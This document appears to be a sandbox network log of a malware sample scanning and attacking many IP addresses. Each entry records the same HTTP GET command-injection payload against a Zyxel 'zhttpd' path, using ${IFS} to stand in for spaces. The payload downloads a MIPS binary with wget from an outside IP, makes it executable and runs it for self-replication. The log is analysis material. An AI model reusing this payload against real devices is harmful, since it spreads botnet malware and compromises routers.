                                      Jan 19, 2024 17:29:21.556189060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1875192.168.2.1432944160.231.27.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556205034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1876192.168.2.143669250.147.172.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556242943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1877192.168.2.145146265.64.93.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556269884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1878192.168.2.143302073.47.230.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556320906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1879192.168.2.1459940166.197.230.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556353092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1880192.168.2.145704248.123.235.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556369066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1881192.168.2.143416449.176.100.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556407928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1882192.168.2.144294867.117.209.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556441069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1883192.168.2.145930840.50.92.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556480885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1884192.168.2.14516802.59.110.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556507111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1885192.168.2.1444794184.187.90.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556540966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1886192.168.2.145556834.224.0.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556592941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1887192.168.2.1440018217.164.204.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556627989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1888192.168.2.145563691.66.5.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556647062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1889192.168.2.145432083.209.209.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556682110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1890192.168.2.144935838.33.140.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556708097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1891192.168.2.1445692153.89.96.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556761026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1892192.168.2.1452394216.245.236.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556792021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1893192.168.2.146002681.223.193.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556832075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1894192.168.2.1455440177.21.122.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556868076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1895192.168.2.1453514136.98.47.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556890011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1896192.168.2.144044660.75.81.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556921005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1897192.168.2.1459404195.252.190.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556952953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1898192.168.2.1452450159.40.44.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556986094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1899192.168.2.1446630155.253.69.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.557403088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1900192.168.2.1452042122.62.182.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.565501928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1901192.168.2.145390217.88.242.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.569286108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1902192.168.2.144645267.8.115.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.569341898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1903192.168.2.1445980140.5.3.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.569380045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1904192.168.2.1433132172.108.20.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.569431067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1905192.168.2.1437908172.129.97.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.569467068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1906192.168.2.145735865.13.153.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.569504976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1907192.168.2.1453952185.103.225.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.569550991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1908192.168.2.144637694.63.223.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.569586039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1909192.168.2.144809441.181.99.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.569616079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1910192.168.2.1437064125.230.46.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.569648981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1911192.168.2.143935072.61.0.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.569684982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1912192.168.2.1455410188.131.80.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.569722891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1913192.168.2.1456530203.42.60.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.569780111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1914192.168.2.145781099.31.19.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.569819927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1915192.168.2.1449988132.145.140.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.569849014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1916192.168.2.144364697.82.113.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.569880009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1917192.168.2.145161892.27.186.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.569925070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1918192.168.2.144322212.175.179.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.569972992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1919192.168.2.1449356110.124.73.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.569978952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1920192.168.2.145808480.126.217.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570040941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1921192.168.2.144283457.219.168.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570075035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1922192.168.2.1444434106.90.222.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570122004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1923192.168.2.144184041.230.156.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570157051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1924192.168.2.14500524.224.154.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570198059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1925192.168.2.1434178166.155.27.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570249081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1926192.168.2.144713672.121.125.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570281029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1927192.168.2.145193647.8.202.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570317984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1928192.168.2.1450516121.124.105.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570360899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1929192.168.2.145887050.25.214.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570384026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1930192.168.2.1445760162.38.12.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570422888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1931192.168.2.145701674.12.171.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570444107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1932192.168.2.144175242.166.22.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570502996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1933192.168.2.1436866101.101.57.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570552111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1934192.168.2.143367073.143.226.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570589066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1935192.168.2.144562294.239.251.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570636988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1936192.168.2.1444126104.146.145.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570656061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1937192.168.2.1454412208.122.61.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:22.570707083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1938192.168.2.1450206103.123.109.23443
                                      TimestampBytes transferredDirectionData
